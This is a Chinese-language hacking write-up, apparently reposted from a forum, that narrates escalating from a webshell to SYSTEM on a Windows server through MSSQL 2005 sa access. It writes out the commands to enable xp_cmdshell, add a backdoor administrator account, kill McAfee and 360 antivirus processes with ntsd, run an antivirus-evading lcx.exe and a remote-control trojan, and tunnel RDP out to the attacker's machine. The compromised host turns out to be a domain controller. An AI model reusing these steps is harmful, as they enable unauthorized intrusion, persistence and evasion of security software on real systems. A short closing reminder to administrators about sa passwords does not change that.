文章作者:udb311

：本文主要以SQL 2005提權為主，講述過程種發(fā)現(xiàn)的一些問題和成功經驗。至少拿到shell的過程不在細說。

前期

在拿到一個webshell 后對提權進行分析如下。

1、serv-u 6.4.0.
2、mssql sa密碼權限
3、sogou拼音輸入

觀察完畢后發(fā)現(xiàn)這個服務器的安全性還真不是一般的差，serv-u 目錄可寫。sogu目錄可寫。MSSQL sa 權限無降權。

第一，先用馬把sogou 目錄下的pingup.exe替換了。準備等些時間再來上線呢，可是服務器安裝了mcafee。過不了它。

第二，再探serv-u,使用大馬自帶的serv-u 提權程序先執(zhí)行下。發(fā)現(xiàn)添加用戶。。原因不明，可能是因為降權。。。

第三、開始入手MSSQL，sa權限很好辦。先來開啟xp_cmdshell，SQL2005默認禁用了xp_cmdshell。

1、使用shell下的SQL提權檢測sql組件存在。如圖

2、先使用xp_cmdshell，net user檢測下可用否？執(zhí)行net user，無果。

3、開啟xp_cmdshell之前要先打開高級配置

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;出現(xiàn)對象關閉時，不允許操作"。

4、開啟xp_cmdshell

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 出現(xiàn)對象關閉時，不允許操作"。

t00ls大牛們說，是不是被降權了?

5、因為SQL不允許，接下來換aspxspy連接數(shù)據庫。

再次執(zhí)行

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 6、查看權限，成功返回system。如圖

這才明白原來是aspspy功能方面的問題。細節(jié)絕對成??！

中期

7、添加用戶
Exec master.dbo.xp_cmdshell 'net user admins udb311 /add'
如圖

密碼不滿足策略要求，要復雜些的。
再來Exec master.dbo.xp_cmdshell 'net user admins udb311!@# /add'

7、添加到administratos組
Exec master.dbo.xp_cmdshell 'net localgroup administrators admins /add'

8、遠程桌面服務打開著，ipconfig /all發(fā)現(xiàn)是內網，沒有映射3389。

9、上傳lcx.exe 轉發(fā)之。發(fā)現(xiàn)執(zhí)行后無反應。

10、換個遠控木馬執(zhí)行。發(fā)現(xiàn)執(zhí)行后也無反應。

11、tasklist /svc 查看服務。mcafee的進程ID分別是1760 1804 1876 3844 4824。

12、ntsd -c q -p 1760 先干掉一個，然后一個個全干了。

13、重新執(zhí)行木馬和lcx.exe 仍然無反應。

14、無耐之下，再看下進程tasklist /svc
ntsd -c q -p 920
ntsd -c q -p 7192

干掉360

再觀察下執(zhí)行木馬發(fā)現(xiàn)文件大小為0了，肯定還是被殺。原來mcafee殺木馬不是把它給請出去，而是隔離。唉！

沒有突破mcafee的防線。。。

進階

16、過了一會后，換一個號稱最新的免殺lcx.exe 上傳后，開始再次執(zhí)行轉發(fā)。

結果如下。

慢慢的有進度了，很緩慢。

17、查看下端口連接，是否有l(wèi)cx轉發(fā)出來的。netstat -ano

如圖

有一條51到我的IP了。。。成功了

18、接下來在路由器做好本機的51端口映射，本機運行l(wèi)cx.exe -listen 51 3389 監(jiān)聽有數(shù)據返回，拿另外一臺虛擬機來連接。如圖

19、杯具啊，原來還是個DC。

總結：針對SQL 2005提權難度就沒有增加，而以往的SQL2000主要是在恢復xp_cmdshell上。MSSQL 2005反而更加簡單些。最后提醒廣大的管理員朋友，請重視您的sa權限與密碼。對于本文有任何疑點歡迎前來討論。內網滲透遇到的問題與難點就是端口轉發(fā)和映射。另外還要考慮的是服務器上的殺毒軟件。

香港服務器租用

版權聲明：本站文章來源標注為YINGSOO的內容版權均為本站所有，歡迎引用、轉載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站，禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯(lián)網收集整理而來，僅供學習參考，不代表本站立場，如有內容涉嫌侵權，請聯(lián)系alex-e#qq.com處理。